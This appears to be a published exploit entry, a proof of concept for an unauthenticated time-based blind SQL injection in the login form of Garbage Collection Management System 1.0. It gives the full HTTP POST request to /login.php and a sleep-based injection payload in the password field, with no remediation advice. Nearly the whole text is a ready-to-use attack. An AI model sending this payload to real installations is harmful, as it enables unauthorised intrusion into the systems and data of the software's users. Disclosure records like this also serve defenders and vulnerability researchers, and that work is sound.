# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated) # Exploit Author: ircashem # Date 02.07.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 #################### # Proof of Concept # #################### POST /login.php HTTP/1.1 Content-Length: 456 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075 Origin: http://localhost DNT: 1 Referer: http://localhost/ Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Connection: close -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="username" admin -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="password" admin' AND (SELECT 1 from (select sleep(5))a) -- - -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="submit" -----------------------------238993435340593308934076060075-- ########### # Payload # ########### username=admin password=admin' AND (SELECT 1 from (select sleep(5))a) -- -